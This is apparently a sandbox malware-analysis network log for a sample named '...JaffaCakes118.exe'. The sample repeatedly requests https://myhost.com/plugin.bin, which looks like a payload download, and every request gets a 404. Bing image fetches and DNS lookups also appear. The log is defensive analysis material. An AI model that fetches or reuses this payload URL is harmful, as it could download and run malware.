      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5m9NwAKTRLETpdXu0aQcfPDZ1Y52CrroTi9gTGpIuE0fPMayeu9swPPW%2BXVDMgVqz0kIjkTImaX%2BJ8xs0cqdj17jYflMT7bjJZU4wRlflhu0k7HYDjHK9ljgBMS"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d03dadf76a4-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:15 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYnmTNwG6gr58wneWo%2F%2BbFgNw5QgRSq9Fkqb7Q%2FAS0hNe1MCEtTbnvrbqn1px8hy7nkHg8t4xdLmc36cp81wZJm5polE8mlehY1Jmi%2Fi6NxnAqlUUdYjI%2FL1vJHJ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d0fabae94fd-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:15 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6OqM%2BjRhha%2FlQ7yTL8q5CNK2x%2BGeVqSA9hamoOwKh2%2B9L1sfYChwpnPFiDicHVkMsQhSa4KxqGbOd0AcUyFTEcUB0WWxnpiG38X%2BZhga0coldpKTflsRy%2B6eoR%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d153a850692-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:17 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtnsWxJIk5rEg2j1RJloTy9Hmu5Y8qW%2FyyRqlmn7pFQ2tGeiksi%2BAUnDpuaqLeMhuNRuCq%2Bm6G4mO90CkqOdNmPe6tgYxg18rZBXw6J6b9F4ClQPT4%2FqLoTk%2FBYR"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d1a890b6556-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:17 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gy9pZP80L9r7UOGnLbigvSOs7j8SYVTsOG8ZUWvP%2FopOVgAZczppDfS8gSvBgo%2F8LJPtIXcBvrSAokqYebqjpbZq5U5nlcV6Kntf8tzu5LNJU7uUDl5Bfu%2BMP1k9"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d21a9488865-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      48.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      48.229.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:18 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1zeXq1FwKQ8zal42ezgB0%2BipWnWms1sEgrQcDzGHEipzNHBTg5O5UfOq319b4WLz754jMhSKUMVnB0PNzU2trUyRowFqRbwm9rcFz78wxQmxcdLkenOdXluBPk7"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d26ebba5476-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:19 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qsUyMBaEk9OlAgMWMKVv%2BghpxNhF8IyKB0%2FflsgRRzC%2Bb8bPkQba0JQhuU9ih87l9EPRbCZZNMvIYM%2Fd%2Fkh2JJF7e6QZmNAO36LwY6Ca1FCfwexdLPtQbFffOc1Q"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d2c4c815279-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:20 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIHMv5eqb7Qp4%2BhGpJ%2B6hsOo9C04Y%2BZtRxR2VR1fXvkRNjAy0%2Bq4XpJZk49PoL68q0tJRAFOU%2Bm2V2AIlq3qIjgWtmhBJEMJX%2Bu8PMBU1wZwItbQN1Pret4ngqlH"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d31fe2e93e6-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:21 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JtEyb6Ych8XdibdCd87uSJoaBC4NNuljuPW0N1P%2BLT9fQlbgpHyVfjnvZfhISSbHekVdLXewnRe%2FkuQobPShkpkZxJiG3gp5%2FmDo7joNjMKUpnQeTaZ%2B4n8A2kxX"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d385e75956c-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:23 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmywoK0MfL06hPSrzoHEGliPZJXtXSOC99lJI78%2FlSidkfbdNqsCa0JAw5yLCAaSn2V2LMrsz2SxwkIKu6TxLDb%2BsYXJg4Rk01H3k4rskrMHkXgg%2BZLAznkg459B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d440f75dd1b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:24 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59HFsH836pnc6%2B0wb959noGSvP35ELClDHyNzHm8czzKDLVkZxo3nRNG0g3IRCUJPqUDuL8pERLsWNsI8t6ocKo1RBkA3pxI1IE9UA79uX1R3DrarPjQzxHCBahJ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d4b6e79769d-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:26 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1UAYePL93bPY2osUd1zZn6mUtnuTpoSVqvDFBsu3JOsLmc4RCKmzIbprLYXU20rW0Wh%2BmE1M7ilR3sMDDVZK0yE98yRER%2FjEANpxVtIFtEpK5ng%2B34aUX%2F3D1%2Fw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d529a2a6359-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      dual-a-0001.a-msedge.net
      dual-a-0001.a-msedge.net
      IN A
      204.79.197.200
      dual-a-0001.a-msedge.net
      IN A
      13.107.21.200
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 430689
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: FFECD9F743B74C06A3EBC3ECDE4F560A Ref B: LON04EDGE1114 Ref C: 2024-05-21T08:58:25Z
      date: Tue, 21 May 2024 08:58:25 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 415458
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 71A6B2004F9C48CF95AAD0F244B23DE9 Ref B: LON04EDGE1114 Ref C: 2024-05-21T08:58:25Z
      date: Tue, 21 May 2024 08:58:25 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 627437
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 618046355D0A42CB9320D65B31134E77 Ref B: LON04EDGE1114 Ref C: 2024-05-21T08:58:25Z
      date: Tue, 21 May 2024 08:58:25 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      204.79.197.200:443
      Request
      GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 792794
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 510998CB9B6248C98A7E149AA935059B Ref B: LON04EDGE1114 Ref C: 2024-05-21T08:58:25Z
      date: Tue, 21 May 2024 08:58:25 GMT
    • flag-us
      DNS
      138.201.86.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      138.201.86.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:27 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ml48%2BeZnFAaG7zbAq4ghWAjjUwEc2LPkZgVCec3Iq1fmVzFEpyuKLA0zUZBeCif%2Bn8otYQkZhpeRnqvLrrw6yRMm%2BvRSRcBrpIIIRScPSpIzaU562jfp2xD%2Bes9%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d59bed071ea-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:28 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kaQPi3PgtYczfoX4YwkqOHwtGhib%2B3Uqak27NhhPT%2B975QkUbl5NXzebVpVfLGkkEnsp%2FRAm35yTAdKn0ebVIJ73aMy9pH3lwet4ieDqymLmmBg44wvRkebjC5HY"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735d60ab434883-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:38 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PkB%2Fcf3tTvat%2BJQbZ3lR4yDXgTvtn0L67IXG%2FCCxxr9KonxN1R6U28Tf0uENSE3c8pcvcFb%2BVc9GqdltFo%2B4JZs2zc%2Bfkh9XFiovy3tW9UbpgC4kbxr%2FrEIa9TkU"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735da47f654177-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
